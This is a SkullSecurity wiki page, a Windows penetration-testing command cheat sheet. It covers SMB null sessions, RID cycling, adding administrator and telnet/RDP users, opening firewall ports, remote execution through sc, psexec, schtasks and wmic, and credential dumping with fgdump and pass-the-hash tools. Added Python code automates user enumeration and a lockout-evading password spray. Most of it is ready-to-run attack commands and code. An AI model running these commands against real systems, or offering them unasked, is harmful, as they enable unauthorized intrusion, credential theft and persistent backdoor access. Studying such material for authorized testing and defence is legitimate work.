Windows Commands

From SkullSecurity

Latest revision as of 09:13, 21 January 2011

Recon

nslookup

  • Types of record: NS, A, HINFO, MX, TXT, CNAME, SOA, RP, PTR, SRV
nslookup <site>
  • Interactive mode (ls -d asks the server for a zone transfer of the whole domain; most servers refuse it):
nslookup
> [name or ip]
> server [server ip]
> set type=any
> ls -d [target_domain] [> filename]
> view [filename]
  • No recurse:
> set norecurse
> set recurse

Scanning

tracert

Parameters

  • -d -- don't resolve names
  • -h <N> -- max number of hops (default 30)
  • -j <hostlist> -- use loose source routing
  • -w <N> -- wait for Nms before timing out (default 4000)

SMB session

Establishing a null session (anonymous; only works where the target still permits null sessions, which Windows has restricted by default since XP/2003)

net use \\<target> "" /u:""

Establishing an authenticated session

net use \\<target> <password> /u:<username>

Mount a share

net use * \\<target>\<share> <password> /u:<username>
net use * \\<target>\<share> <password> /u:<machinename>\<username>
net use * \\<target>\c$ <password> /u:<username>

Dropping SMB sessions

net use \\<target> /del

Dropping all SMB sessions (bad idea: this also drops your own mapped drives)

net use * /del

Pulling credentials (w/ SMB session)

Pulling credentials

enum -U <target>
enum -G <target>

user2sid

  • Outputs a SID of the form S-1-5-21-<A>-<B>-<C>-<RID>; everything before the final RID is the machine (or domain) SID, which is what you get back when you look up the machine name itself
user2sid \\<target> <machine_name>

sid2user

  • Takes the SID with the leading S-1- dropped and spaces instead of dashes (so S-1-5-21-<A>-<B>-<C> becomes 5 21 <A> <B> <C>), followed by the RID to resolve; 500 is Administrator and 501 Guest, accounts created later start at 1000
sid2user \\<target> 5 <target_sid> <N>
for /L %i in (1000, 1, 1050) do @sid2user \\<target> 5 <target_sid> %i
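
RID cycling around user2sid / sid2user, as an added example (not code from the original page or from those tools). It converts the SID user2sid prints into the space-separated form sid2user expects, generates the same command lines the for /L loop above runs, and parses the replies into name/domain/type. Everything it consumes is a constructed sample: the user2sid output, the sid2user replies (whose "Name is / Domain is / Type of SID is" layout is assumed from typical output) and the placeholder target name.

```python
"""RID cycling with user2sid / sid2user: an added example, not code from the original
page or from those tools. It converts the SID user2sid prints into the space-separated
form sid2user expects, emits the same command lines as the page's for /L loop, and
parses the replies. Sample outputs are constructed here; the "Name is / Domain is /
Type of SID is" layout is assumed from typical sid2user output."""
import re
from typing import Callable, Dict, Iterable, List, Optional

SID_RE = re.compile(r"S-1-\d+(?:-\d+)+")

# Well-known RIDs worth resolving before sweeping the 1000+ range (fixed by Windows).
WELL_KNOWN_RIDS = {500: "Administrator", 501: "Guest", 512: "Domain Admins", 513: "Domain Users"}

# Constructed sample of `user2sid \\target <machine_name>` output.
SAMPLE_USER2SID = "S-1-5-21-1234567890-987654321-1122334455\nNumber of subauthorities is 4\n"

# Constructed sid2user replies keyed by RID, standing in for a live target.
SAMPLE_SID2USER = {
    500: "Name is Administrator\nDomain is TARGET\nType of SID is SidTypeUser\n",
    501: "Name is Guest\nDomain is TARGET\nType of SID is SidTypeUser\n",
    1000: "Name is alice\nDomain is TARGET\nType of SID is SidTypeUser\n",
}
NO_MAPPING = "LookupSidName failed\n"   # constructed stand-in for an unused RID


def extract_sid(user2sid_output: str) -> Optional[str]:
    """First SID in user2sid output, or None if it printed none."""
    m = SID_RE.search(user2sid_output)
    return m.group(0) if m else None


def domain_sid(sid: str) -> str:
    """S-1-5-21-A-B-C[-RID] -> S-1-5-21-A-B-C (drop a trailing RID if present)."""
    parts = sid.split("-")
    if not SID_RE.fullmatch(sid) or parts[2:4] != ["5", "21"]:
        raise ValueError(f"not an NT machine/domain SID: {sid}")
    if len(parts) == 8:            # S,1,5,21,A,B,C,RID -> strip the RID
        parts = parts[:-1]
    if len(parts) != 7:
        raise ValueError(f"unexpected sub-authority count: {sid}")
    return "-".join(parts)


def sid2user_args(sid: str, rid: int) -> str:
    """'S-1-5-21-A-B-C' + rid -> '5 21 A B C rid', the argument form sid2user wants."""
    return " ".join(domain_sid(sid).split("-")[2:] + [str(rid)])


def sid2user_commands(target: str, sid: str, rids: Iterable[int]) -> List[str]:
    """The command lines the page's for /L loop runs, one per RID."""
    return [f"sid2user \\\\{target} {sid2user_args(sid, rid)}" for rid in rids]


def parse_sid2user(output: str) -> Optional[Dict[str, str]]:
    """One sid2user reply -> {'name', 'domain', 'type'}; None when the RID is unused."""
    fields = {}
    for key, label in (("name", "Name is"), ("domain", "Domain is"), ("type", "Type of SID is")):
        m = re.search(rf"^{label}\s+(.+?)\s*$", output, re.MULTILINE)
        if m:
            fields[key] = m.group(1)
    return fields if "name" in fields else None


def cycle_rids(target: str, sid: str, rids: Iterable[int],
               run: Callable[[str], str]) -> Dict[int, Dict[str, str]]:
    """Resolve each RID through `run`, a callable that executes one command line and
    returns its stdout (e.g. lambda c: subprocess.run(c, capture_output=True,
    text=True).stdout on a Windows box with sid2user in PATH)."""
    rids = list(rids)
    hits = {}
    for rid, cmd in zip(rids, sid2user_commands(target, sid, rids)):
        parsed = parse_sid2user(run(cmd))
        if parsed:
            hits[rid] = parsed
    return hits


def fake_run(cmd: str) -> str:
    """Offline stand-in for running sid2user: answers from the constructed samples."""
    rid = int(cmd.rsplit(" ", 1)[1])
    return SAMPLE_SID2USER.get(rid, NO_MAPPING)


if __name__ == "__main__":
    sid = extract_sid(SAMPLE_USER2SID)
    rids = list(WELL_KNOWN_RIDS) + list(range(1000, 1051))
    for rid, who in cycle_rids("target", sid, rids, fake_run).items():
        print(rid, who["domain"] + "\\" + who["name"], who["type"])
```

Resolve the well-known RIDs first (500, 501 and, on a domain, 512/513) before sweeping 1000 upward: they tell you whether the cycling works at all and what the administrator account has been renamed to.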

Exploitation

Finding client-side programs

dir /s "c:\Program Files"
dir /s /b "c:\Program Files\*.exe"

Service interaction

List running services

sc query

List all services

sc query state= all

List all service names

sc query state= all | find "SERVICE_NAME"

Query service information

sc query <servicename>
sc qc <servicename>

Start a service (the space after start= is mandatory; the config step is only needed when the service is disabled)

sc config <servicename> start= demand
sc start <servicename>

Starting telnet

sc query tlntsvr
sc config tlntsvr start= demand
sc start tlntsvr

Starting terminal services

sc query termservice
sc config termservice start= demand
sc start termservice
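
Parsing the sc output instead of piping it through find, as an added example (not code from the original page). It turns an sc query listing into one record per service, picks out the stopped ones such as tlntsvr or termservice, reads the start type from sc qc, and emits exactly the sc config / sc start lines shown above. Both listings are constructed samples in the layout sc prints; the target address is a placeholder.

```python
"""Parsing sc query / sc qc output: an added example, not code from the original page.
Rather than piping sc query through find "SERVICE_NAME", this turns the listing into
one record per service, picks out the stopped ones (tlntsvr, termservice, ...) and
emits the exact sc config / sc start lines used above. Both listings are constructed
samples in the layout sc prints."""
from typing import Dict, List, Optional

# Constructed sample of `sc query state= all` (two of the usual several dozen entries).
SAMPLE_SC_QUERY = """
SERVICE_NAME: TermService
DISPLAY_NAME: Remote Desktop Services
        TYPE               : 20  WIN32_SHARE_PROCESS
        STATE              : 1  STOPPED
        WIN32_EXIT_CODE    : 1077  (0x435)
        SERVICE_EXIT_CODE  : 0  (0x0)
        CHECKPOINT         : 0x0
        WAIT_HINT          : 0x0

SERVICE_NAME: LanmanServer
DISPLAY_NAME: Server
        TYPE               : 20  WIN32_SHARE_PROCESS
        STATE              : 4  RUNNING
                                (STOPPABLE, PAUSABLE, ACCEPTS_SHUTDOWN)
        WIN32_EXIT_CODE    : 0  (0x0)
        SERVICE_EXIT_CODE  : 0  (0x0)
        CHECKPOINT         : 0x0
        WAIT_HINT          : 0x0
"""

# Constructed sample of `sc qc TermService` on a host where RDP is disabled.
SAMPLE_SC_QC = """
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: TermService
        TYPE               : 20  WIN32_SHARE_PROCESS
        START_TYPE         : 4   DISABLED
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : C:\\Windows\\System32\\svchost.exe -k NetworkService
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : Remote Desktop Services
        DEPENDENCIES       : RPCSS
        SERVICE_START_NAME : NT Authority\\NetworkService
"""


def parse_sc_query(text: str) -> Dict[str, Dict[str, str]]:
    """Map SERVICE_NAME -> {field: value} for every service block in sc output."""
    services: Dict[str, Dict[str, str]] = {}
    current: Optional[str] = None
    for line in text.splitlines():
        if line.startswith("SERVICE_NAME:"):
            current = line.split(":", 1)[1].strip()
            services[current] = {}
        elif current is not None and ":" in line:
            key, value = line.split(":", 1)     # first colon; the drive letter colon comes later
            if key.strip():
                services[current][key.strip()] = value.strip()
    return services


def parse_sc_qc(text: str) -> Dict[str, str]:
    """sc qc prints a single block; return its fields (START_TYPE, BINARY_PATH_NAME, ...)."""
    blocks = parse_sc_query(text)
    if len(blocks) != 1:
        raise ValueError("expected exactly one SERVICE_NAME block in sc qc output")
    return next(iter(blocks.values()))


def state_of(record: Dict[str, str]) -> str:
    """'1  STOPPED' -> 'STOPPED'."""
    return record["STATE"].split()[-1] if record.get("STATE") else ""


def start_type(qc: Dict[str, str]) -> str:
    """'4   DISABLED' -> 'DISABLED'."""
    return qc["START_TYPE"].split()[-1] if qc.get("START_TYPE") else ""


def stopped_services(services: Dict[str, Dict[str, str]]) -> List[str]:
    return sorted(name for name, rec in services.items() if state_of(rec) == "STOPPED")


def start_commands(name: str, qc: Dict[str, str], target: Optional[str] = None) -> List[str]:
    """The page's start sequence: a disabled service must be switched to demand start
    before sc start will accept it. Note the mandatory space after 'start='."""
    prefix = f"sc \\\\{target} " if target else "sc "
    cmds = []
    if start_type(qc) == "DISABLED":
        cmds.append(f"{prefix}config {name} start= demand")
    cmds.append(f"{prefix}start {name}")
    return cmds


if __name__ == "__main__":
    svcs = parse_sc_query(SAMPLE_SC_QUERY)
    print("stopped:", stopped_services(svcs))
    for cmd in start_commands("TermService", parse_sc_qc(SAMPLE_SC_QC)):
        print(cmd)
```

Feed it the real output with `sc query state= all > services.txt` and `sc qc <servicename> > qc.txt` (or the `sc \\<target>` forms over an SMB session) and read the files; the parser only depends on the "SERVICE_NAME:" block headers and the "FIELD : value" rows.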

Using sc to invoke an executable (creates and starts a service on the target; quote binpath= if the command contains spaces, and the account needs administrative rights on the target)

net use \\<target> <password> /u:<username>
sc \\<target> create <name> binpath= <command>
sc \\<target> start <name>

Making that service invoke another executable (a plain program never reports to the service control manager, so sc start returns error 1053 and the SCM kills the service process after its timeout; wrapping the command in cmd.exe still gets it launched first. Remove the leftover service afterwards with sc delete.)

sc \\<target> create <name> binpath= "cmd.exe /k <command>"

Variables

Finding environment variables

set

Finding a specific variable

set <variable>
echo %<variable>%
set username
set path
set systemroot
echo %systemroot%
cd %systemroot%
etc.

Users and groups

Listing users

net user

Creating a user

net user <username> <password> /add

Listing groups

net localgroup

Creating a group

net localgroup <groupname> /add

Adding a user to a group

net localgroup <groupname> <username> /add

Adding a user to the telnet users group (the Telnet server only admits members of TelnetClients; the second line creates the group if it does not exist yet)

net user <username> <password> /add
net localgroup TelnetClients /add
net localgroup TelnetClients <username> /add

Adding a user to the terminal services group

net localgroup "Remote Desktop Users" <username> /add

List administrators

net localgroup administrators

Add an administrator

net user <username> <password> /add
net localgroup administrators <username> /add

Remove a user from a group

net localgroup <group> <username> /del

Delete a user

net user <username> /del

Firewall interaction

The netsh firewall context used below is the Windows XP / Server 2003 syntax; from Vista onward it is deprecated in favour of netsh advfirewall firewall. Keep scope = custom addresses = <your address> on every opening so the hole is reachable only from your own host.

Help

netsh /?

Show config

netsh firewall show config

Open a specific port

netsh firewall add portopening protocol = <TCP|UDP> port = <port> name = <comment> scope = custom addresses = <address/CIDR>

Remove the port opening

netsh firewall del portopening protocol = <TCP|UDP> port = <port>

Disable the firewall completely (bad idea: it exposes the host to everyone, not just you, and is far more noticeable than a single scoped opening)

netsh firewall set opmode disable

Opening the firewall for telnet

netsh firewall add portopening protocol = TCP port = 23 name = telnet mode = enable scope = custom addresses = <address>

Opening the firewall for terminal services

netsh firewall set service type = remotedesktop mode = enable scope = custom addresses = <address>

Opening the firewall for SSH

netsh firewall add portopening protocol = TCP port = 22 name = sshd mode = enable scope = custom addresses = <address>

Registry interaction

Query a key

reg query <keyname>

Adding a value (the key is created if it does not exist yet)

reg add <keyname> /v <valuename> /t <type> /d <data>

Export data

reg export <keyname> <filename.reg>

Import data

reg import <filename.reg>

Enabling terminal services (clears fDenyTSConnections; the termservice service still has to be running and TCP 3389 open in the firewall)

reg add "hklm\system\currentcontrolset\control\terminal server" /v fdenytsconnections /t reg_dword /d 0

netstat

Finding a port (find matches substrings, so include the colon and the trailing space or a search for 80 also matches 8080 and 1800)

netstat -an | find ":<port> "

ipconfig

Dump the DNS cache

ipconfig /displaydns

arp

Dump the ARP cache

arp -a

Looping

/L loop

for /L %i in (<start>,<step>,<stop>) do <command>

Counting

for /L %i in (1,1,255) do @echo %i

Ping scanning (-n 5 sends five echo requests per host; -n 1 is much faster for a sweep)

for /L %i in (1,1,255) do @echo 10.10.10.%i & @ping -n 5 10.10.10.%i | find "Reply"

Reverse DNS sweep (PTR lookup for every address in the range)

for /L %i in (1,1,255) do @nslookup 10.10.10.%i 2>nul | find "Name" && echo 10.10.10.%i

/F loop

for /F ["<options>"] %i in (<stuff>) do <command>

Looping through passwords (check the lockout policy with net accounts first; "delims=" and the quotes keep passwords containing spaces whole, and && pause stops at the first success)

for /F "delims=" %i in (password.lst) do @echo %i & @net use \\<target> "%i" /u:<username> 2>nul && pause

Portscanning from a file

for /F %i in (ports.txt) do @nc -n -vv -w3 10.10.10.50 %i

psexec

Using psexec (sysinternals; it copies its PSEXESVC service binary to the target's ADMIN$ share and installs it as a service, so it needs an administrative account and SMB access)

  • -s to run as SYSTEM
  • -c to copy the program to the target first
  • -d don't wait for the process to terminate (non-interactive; no output comes back to your console)
psexec \\<target> -d -u <user> -p <password> <command>

at/schtasks

Starting the scheduler service (at needs the Schedule service running on the target)

net use \\<target> <password> /u:<username>
sc [\\<target>] query schedule
sc [\\<target>] start schedule

Scheduling with at:

at [\\<target>] <HH:MM><A|P> <command>

Scheduling with schtasks

schtasks /create /tn <taskname> /s <target> /u <user> /p <password> /sc <frequency> /st <starttime> /sd <startdate> /tr <command>

wmic

Running a program

wmic /node:<target> /user:<username> /password:<password> process call create <command>

List processes

wmic /node:<target> /user:<username> /password:<password> process list brief

Kill a process by PID or by image name

wmic /node:<target> /user:<username> /password:<password> process where processid="<pid>" delete
wmic /node:<target> /user:<username> /password:<password> process where name="<name>" delete

Passwords

Account lockout

Info on Windows accounts (password policy plus lockout threshold, duration and observation window; check this before guessing passwords)

net accounts
net accounts /domain
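
A lockout-aware version of the password loop from "Looping through passwords", driven by the policy that net accounts reports, as an added example (not code from the original page). It parses the lockout threshold, duration and observation window, works out how many guesses fit under the threshold per window, and produces the net use command lines in paced batches, dropping the session after a hit so the next attempt does not fail with error 1219. The net accounts listing is a constructed sample in the layout the command prints; the target and user names are placeholders.

```python
"""Lockout-aware password guessing: an added example, not code from the original page.
The for /F loop under "Looping through passwords" will lock the account out if the
policy reported by net accounts has a lockout threshold. This parses that report,
works out how many guesses fit under the threshold per observation window, and
produces the net use command lines to run in paced batches. The net accounts listing
is a constructed sample in the layout the command prints; names are placeholders."""
from typing import Dict, List, Optional, Tuple

# Constructed sample of `net accounts` on a host with a five-attempt lockout policy.
SAMPLE_NET_ACCOUNTS = """
Force user logoff how long after time expires?:       Never
Minimum password age (days):                          0
Maximum password age (days):                          42
Minimum password length:                              0
Length of password history maintained:                None
Lockout threshold:                                    5
Lockout duration (minutes):                           30
Lockout observation window (minutes):                 30
Computer role:                                        WORKSTATION
The command completed successfully.
"""

LOCKOUT_FIELDS = {
    "Lockout threshold": "threshold",
    "Lockout duration (minutes)": "duration",
    "Lockout observation window (minutes)": "window",
}


def parse_net_accounts(text: str) -> Dict[str, Optional[int]]:
    """Lockout threshold/duration/window as ints; None where Windows prints Never."""
    policy: Dict[str, Optional[int]] = {name: None for name in LOCKOUT_FIELDS.values()}
    for line in text.splitlines():
        if ":" not in line:
            continue
        label, value = line.split(":", 1)
        key = LOCKOUT_FIELDS.get(label.strip())
        if key is not None:
            value = value.strip()
            policy[key] = int(value) if value.isdigit() else None
    return policy


def attempts_per_window(policy: Dict[str, Optional[int]], safety_margin: int = 2) -> Optional[int]:
    """Guesses per observation window that stay below the threshold, leaving
    safety_margin bad attempts for the real user's own typos. None means there is
    no lockout policy; 0 means the account cannot be guessed at safely."""
    if policy["threshold"] is None:
        return None
    return max(0, policy["threshold"] - safety_margin)


def attempt_command(target: str, username: str, password: str) -> str:
    """One guess: quote the password so spaces survive, and drop the session on
    success so a hit does not make the next attempt fail with error 1219.
    Passwords containing " or & would still need escaping for cmd.exe."""
    return (f'net use \\\\{target} "{password}" /u:{username} 2>nul'
            f' && (echo FOUND: {password} & net use \\\\{target} /del)')


def plan_spray(target: str, username: str, passwords: List[str],
               policy: Dict[str, Optional[int]], safety_margin: int = 2) -> Tuple[List[List[str]], int]:
    """Split the wordlist into batches that fit under the lockout threshold.
    Returns (batches of command lines, minutes to wait between batches)."""
    if not passwords:
        return [], 0
    per_window = attempts_per_window(policy, safety_margin)
    if per_window == 0:
        raise ValueError("lockout threshold too low to guess safely against this account")
    if per_window is None:                 # no lockout policy: one batch, no waiting
        per_window, wait = len(passwords), 0
    else:
        wait = policy["window"] or 0
    batches = []
    for i in range(0, len(passwords), per_window):
        batches.append([attempt_command(target, username, pw) for pw in passwords[i:i + per_window]])
    return batches, wait


if __name__ == "__main__":
    policy = parse_net_accounts(SAMPLE_NET_ACCOUNTS)
    batches, wait = plan_spray("target", "bob", ["Winter2011", "Password 1", "abc", "def"], policy)
    for n, batch in enumerate(batches):
        if n:
            print(f"REM wait {wait} minutes before the next batch")
        print("\n".join(batch))
```

With the sample policy (threshold 5, window 30) the plan is three guesses, a 30-minute pause, then the rest; the observation window restarts with every bad attempt, so the pause has to follow the last guess of a batch, not the first. Against a domain account use `net accounts /domain` for the policy, since the domain setting overrides the local one.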

fgdump

Options

  • -c -- don't get cached credentials
  • -h <target>
  • -u <username>
fgdump -c -h <target> -u <username>

Pass-the-hash toolkit (psh-toolkit)

Trend finally noticed/deleted these programs, so I don't have their parameters handy

  • whosthere.exe
  • genhash.exe
  • iam.exe

Helpful hints

ftp

Download a file as anonymous

ftp -A -s:ftp-script.txt <host>

The script

get <file>
bye

An even better script, that grabs everything in the base directory (prompt turns off the per-file confirmation so mget runs unattended)

prompt
mget .
bye